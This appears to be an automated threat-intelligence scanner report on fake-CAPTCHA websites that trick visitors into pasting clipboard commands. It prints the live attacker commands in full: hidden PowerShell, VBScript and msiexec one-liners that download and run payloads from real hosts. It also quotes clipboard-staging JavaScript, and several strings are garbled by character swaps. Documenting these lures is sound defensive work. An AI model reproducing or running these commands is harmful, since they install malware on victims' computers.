Threat Intelligence Report
37
Total Sites Analyzed
18
Malicious Sites
49.0% detection rate
25
PowerShell Commands
86
Clipboard Hijacks
300
Avg Threat Score
Attack Pattern Analysis
21
High Risk Commands
64
Base64 Encoded
1
Obfuscated JS
8
Inline JS Redirects
0
External JS Chains
5
Redirect Follows
Top Indicators/Keywords
failed_to_retrieve (6)
hidden (5)
robot (4)
CAPTCHA Verification (2)
I am not a robot (2)
Robot (2)
Verification (2)
verification (2)
verification-id (2)
To better prove you are not a robot (2)
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator) (2)
exec( (2)
Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_`b�ce
g��di�jimo�hpquruvwy{|}~������������������#���� �-�&�
�)�������K
����.���aZ���^������z�����[�����A�������������� � (1)
invoke (1)
.EXE (1)
Malicious Sites Detected
Click on a site to view detailed analysishttps://suiiki-e-r.com
86 indicators detected
Score: 808
PowerShell
Clipboard Hijack
2
powershell
6
clipboard
1
obfuscation
3
captcha
2
base64
21
suspicious keywords
2
high risk
💻 PowerShell Commands 2
powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object
🔍 Suspicious Keywords 21
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
🔐 Obfuscated JavaScript
Showing first 1 of 1 entries (truncated for performance)
{'script': 'function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_...', 'indicators': [{'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1922f2[_0x30231a]', "_0x307c06['push']"], 'count': 11}, {'pattern': '_0x[a-f0-9]{2,6}\\s*=\\s*function', 'examples': ['_0x3023=function', '_0x1922=function'], 'count': 2}, {'pattern': '\\(function\\s*\\(\\s*_0x[a-f0-9]{2,6}\\s*,\\s*_0x[a-f0-9]{2,6}\\s*\\)', 'examples': ['(function(_0x16ffe6,_0x1e5463)'], 'count': 1}, {'pattern': 'function\\s+_0x[a-f0-9]{4,8}', 'examples': ['function _0x3023', 'function _0x1922'], 'count': 3}, {'pattern': 'let\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['let _0x2b207e=', 'let _0x399500='], 'count': 3}, {'pattern': 'const\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['const _0x1922f2=', 'const _0x5a990b='], 'count': 18}, {'pattern': '[a-zA-Z0-9_$]{1,3}\\[[\\\'"`]push[\\\'"`]\\]', 'examples': ["c06['push']", "c06['push']"], 'count': 2}], 'score': 40, 'position': 36131}
https://belezamolecular.com.br
73 indicators detected
Score: 618
PowerShell
Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk
💻 PowerShell Commands 2
powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object
🔍 Suspicious Keywords 21
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://myticket.kwirs.xyz
73 indicators detected
Score: 618
PowerShell
Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk
💻 PowerShell Commands 2
powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object
🔍 Suspicious Keywords 21
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://laflacatea.com
73 indicators detected
Score: 618
PowerShell
Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk
💻 PowerShell Commands 2
powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object
🔍 Suspicious Keywords 21
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://deibignite.com
73 indicators detected
Score: 618
PowerShell
Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk
💻 PowerShell Commands 2
powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object
🔍 Suspicious Keywords 21
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://www.dolphin.edu.np
68 indicators detected
Score: 561
Clipboard Hijack
Fake CAPTCHA
6
clipboard
3
captcha
3
base64
1
redirects
18
suspicious keywords
🔍 Suspicious Keywords 18
cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://95.i64.53.ii5:5506/do.vbs",0:h.Send:Execute h.ResponseText > "%temp%\do.tmp" && wscript //E:VBScript "%temp%\do.tmp"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://95.i64.53.ii5:5506/do.vbs",0:h.Send:Execute h.ResponseText > "%temp%\do.tmp" && wscript //E:VBScript "%temp%\do.tmp"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
http://95.164.53.115:5506/do.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://academie.habg.ci
66 indicators detected
Score: 544
Clipboard Hijack
Fake CAPTCHA
6
clipboard
3
captcha
3
base64
18
suspicious keywords
🔍 Suspicious Keywords 18
command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://kodamablog.com
66 indicators detected
Score: 544
Clipboard Hijack
Fake CAPTCHA
6
clipboard
3
captcha
3
base64
18
suspicious keywords
🔍 Suspicious Keywords 18
command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://panamawebhosting.com
66 indicators detected
Score: 544
Clipboard Hijack
Fake CAPTCHA
6
clipboard
3
captcha
3
base64
18
suspicious keywords
🔍 Suspicious Keywords 18
command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://sambaza.co
65 indicators detected
Score: 539
Clipboard Hijack
Fake CAPTCHA
6
clipboard
3
captcha
2
base64
18
suspicious keywords
🔍 Suspicious Keywords 18
command = "msiexec /i https://configservermu.net/cioudfiare/chaiienge/iamhumanverification/ID5372728i5/";
exec /i https://configservermu.net/cioudfiare/chaiienge/iamhumanverification/ID5372728i5/";
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://configservermu.net/cloudflare/challenge/iamhumanverification/ID537272815/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://kongogenie.com
65 indicators detected
Score: 539
Clipboard Hijack
Fake CAPTCHA
6
clipboard
3
captcha
2
base64
18
suspicious keywords
🔍 Suspicious Keywords 18
command = "msiexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
🌐 Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://ftp.knowzalearning.com
50 indicators detected
Score: 409
PowerShell
Clipboard Hijack
3
powershell
6
clipboard
3
captcha
19
suspicious keywords
2
high risk
💻 PowerShell Commands 3
powershell.exe -w h -nop -c
Invoke-Expression
New-Object
🔍 Suspicious Keywords 19
command = "";
command = obfuscatedCommandParts.map(partArray =>
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification
🌐 Extracted URLs 2
https://i.postimg.cc/k4zrz92z/111.png
https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ndChild(textarea); textarea.select(); document.execCommand('copy'); document.body.removeChild(textarea);...
...reventDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); console.log('✅ Кома...
https://ftp.schoolofhealthcare.co.uk
50 indicators detected
Score: 409
PowerShell
Clipboard Hijack
3
powershell
6
clipboard
3
captcha
19
suspicious keywords
2
high risk
💻 PowerShell Commands 3
powershell.exe -w h -nop -c
Invoke-Expression
New-Object
🔍 Suspicious Keywords 19
command = "";
command = obfuscatedCommandParts.map(partArray =>
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification
🌐 Extracted URLs 2
https://i.postimg.cc/k4zrz92z/111.png
https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg
📋 Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ndChild(textarea); textarea.select(); document.execCommand('copy'); document.body.removeChild(textarea);...
...reventDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); console.log('✅ Кома...
https://cap.opetap.com
47 indicators detected
Score: 381
PowerShell
Clipboard Hijack
6
powershell
5
clipboard
1
downloads
4
captcha
17
suspicious keywords
5
high risk
💻 PowerShell Commands 6
powershell -w Hidden -ep Bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://cap.opetap.com/payload.ps1')\"";
IEX(New-Object Net.WebClient).DownloadString('http://cap.opetap.com/payload.ps1')
New-Object
DownloadString
.DownloadString
🔍 Suspicious Keywords 17
Command = "powersheii -w Hidden -ep Bypass -c \"IEX(New-Object Net.WebCiient).DownioadString('http://cap.opetap.com/payioad.psi')\"";
Command + suffix + pioy + verification_id + end
CAPTCHA Verification
Verification ID
I am not a robot
Robot
robot
Verification
verification
verification-id
🌐 Extracted URLs 5
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://logo.svgcdn.com/logos/recaptcha.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
http://cap.opetap.com/payload.ps1
📋 Clipboard Manipulation Code
Showing first 2 of 4 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const reverseShellCommand = "powershell -w Hidden -ep Bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://cap.opetap.com/payload.ps1')\""; const suffix = " # " const ploy = "✅ ''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = reverseShellCommand + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...
http://82.146.62.232/
48 indicators detected
Score: 322
Fake CAPTCHA
Redirect Chain
2
captcha
6
base64
1
redirects
1
redirect follows
4
suspicious keywords
🔍 Suspicious Keywords 4
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
robot
exec(
hidden
🌐 Extracted URLs 15
https://svetvip.ru/
https://api.whatsapp.com/send?phone=79258627909
https://api.whatsapp.com/send?phone=79258627909
https://svetvip.ru/catalog/vstraivaemye_svetilniki/
https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/
🛰️ Redirect Follower Findings (1)
Source: inline_js
Method: script_src
new Image().src='http://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5NzEyOTA5MAEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAFkYjY3NTBhMjIwMzI1NTlhMmJlZmYzMDNjNjQwYWVlNgExNzk3MTI5MDkwAS8BAQEC&k=4aa8754b137e1ad7480dfbfff86ef594';
Status: ok
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address> </body></html>
https://82.146.62.232/
47 indicators detected
Score: 317
Fake CAPTCHA
Redirect Chain
2
captcha
5
base64
1
redirects
1
redirect follows
4
suspicious keywords
🔍 Suspicious Keywords 4
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
robot
exec(
hidden
🌐 Extracted URLs 15
https://svetvip.ru/
https://api.whatsapp.com/send?phone=79258627909
https://api.whatsapp.com/send?phone=79258627909
https://svetvip.ru/catalog/vstraivaemye_svetilniki/
https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/
🛰️ Redirect Follower Findings (1)
Source: inline_js
Method: script_src
new Image().src='https://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5NzEyOTA4MgEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAE3Nzk0OWViMzhhZTEwZGE4ZjM1ODgyNzFjZTc3NzE2ZQExNzk3MTI5MDgyAS8BAQEC&k=5e7ee7332f0f7560ef6013b2ed6748af';
Status: ok
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address> </body></html>
https://blessdayservices.org/up/
40 indicators detected
Score: 309
PowerShell
Clipboard Hijack
3
powershell
5
clipboard
1
downloads
4
captcha
13
suspicious keywords
2
high risk
💻 PowerShell Commands 3
powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;
iwr
🔍 Suspicious Keywords 13
CAPTCHA Verification
Verification Hash
I am not a robot
Robot
robot
Verification
verification
verification-id
verification_id
To better prove you are not a robot
🌐 Extracted URLs 5
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1
📋 Clipboard Manipulation Code
Showing first 2 of 4 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "â ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...
https://www.vpnathan-partners.com.my
19 indicators detected
Score: 175
2
base64
1
redirects
1
suspicious keywords
🔍 Suspicious Keywords 1
hidden
🌐 Extracted URLs 7
https://mobirise.com
https://mobirise.eu/
https://mobiri.se/
https://mobiri.se/
https://mobiri.se/